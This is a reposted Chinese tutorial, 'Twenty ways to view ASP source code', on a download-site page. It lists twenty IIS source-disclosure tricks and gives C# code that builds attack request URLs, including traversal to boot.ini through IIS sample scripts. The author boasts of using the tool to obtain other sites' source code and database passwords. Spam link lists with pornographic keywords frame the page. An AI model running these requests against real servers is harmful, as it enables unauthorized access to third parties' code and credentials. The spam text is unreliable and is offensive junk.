日本国产亚洲-日本国产一区-日本国产一区二区三区-日本韩国欧美一区-日本韩国欧美在线-日本韩国欧美在线观看

當前位置:雨林木風下載站 > 技術開發教程 > 詳細頁面

20種看asp源碼的辦法及工具

20種看asp源碼的辦法及工具

更新時間:2022-05-01 文章作者:未知 信息來源:網絡 閱讀次數:

    眾所周知windows平臺漏洞百出,補丁一個接一個,但總是補也補不凈。我把我所知道的20種看asp源碼的方法總結了一下,并且用c#寫了個應用程序來掃描這些漏洞,發現雖然大部分的方法已經不起做用,但還是有一些漏網之魚的:),結果這兩天真看到不少站的源代碼,包括數據庫密碼,如果用access的可以把庫下載下來,而用sql server的如果不是用udl,dsn等來連接的話,也可以通過tcp/ip網絡庫連接到數據庫,為所欲為呀。先面把這20種方法列在下面:

.
%81
::DATA
%2e
%2e%41sp
+.htr
\\
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
search/qfullhit.htw
search/qsumrhit.htw
iirturnh.htw
.htw
Translate:f


上邊這些漏洞前面10幾條是通過在asp文件后直接加上,如%81就是xxx.asp%81,后面這些都是通過iis自帶的例子或系統漏洞實現的,最特別的是那種translate:f方法,它直接通過瀏覽器是無法使用的,必須同服務器建立tcp/ip的socket連接,發送請求才行,具體每個漏洞如何使用,看下面,這是我那個應用程序的一部分,如果你要全部的可以到我的站點去下載。

                switch (this.cboMethod.SelectedIndex)
                {
                    case 0:          //直接讀取
                        strRequestFile = strServer + strUrl ;
                        break ;
                    case 5 :         //%2e%41sp
                        strRequestFile = strServer + strPath + strFirst
                                        + "%2e%41sp" ;
                        break ;
                    case 8 :        //longhtr
                        strRequestFile = strServer + strUrl
                             + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                             + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                             + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
                        break ;

                    case 10:     //codebrws.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                                        + strUrl ;
                        break ;

                    case 11:    //showcode.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                                        + "/msadc/../../../../boot.ini" ;
                        break;

                    case 12 :  //null.htw
                        strRequestFile = strServer + "/null.htw?CiWebHitsFile="
                                        + strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
                        break ;
                    case 13 :  //qfullhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 14 :  //qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 15 :  //query.idq
                        strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
                        break ;

                    case 16:   //search/qfullhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 17:   // search/qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;
                    
                    case 18:   //iirturnh.htw
                        strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 19:  //.htw
                        strRequestFile = strServer + strUrl
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full" ;
                        break ;

                    default:
                        strRequestFile = strServer + strUrl + this.cboMethod.Text ;
                }

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

主站蜘蛛池模板: 国产三级小视频 | 国产一区二区中文字幕 | 亚洲久久网 | fc2成本人免费视频 fenfencao在线观看免费视频 | 制服美女视频一区 | 久久久国产一区二区三区 | 亚洲一区二区天天影视 | 欧美成人影院在线观看三级 | 中国精品视频一区二区三区 | 久久九九影视 | 中文字幕精品一区二区三区在线 | 国产亚洲欧美在线视频 | 日韩成人在线视频 | 欧美日韩无 | 黑人中文字幕在线精品视频站 | 色热综合 | 成人浮力影院免费看 | 久久精品91 | 国产日韩欧美综合色视频在线 | 猫咪www免费人成网站在线观看 | 91日韩精品天海翼在线观看 | 白石真琴heyzo手机在线 | 91在线影视 | 成人男女网免费 | 五月婷婷影视 | 亚洲婷婷综合中文字幕第一页 | 国产xxxx做受性欧美88 | 国产美女a做受大片免费 | 免费视频97碰碰碰在线观看 | 成年男女免费视频网站 | 日本 欧美 国产 | 日本人强jizz多人高清 | 亚洲综合色在线观看 | 久久人与动人物a级毛片 | 最近手机高清中文字幕大全7 | 国产精品中文字幕在线 | 国产91香蕉在线精品 | 亚洲在线小视频 | 日本亚洲高清乱码中文在线观看 | 中文字幕亚洲欧美一区 | 国产偷国产偷亚洲高清人乐享 |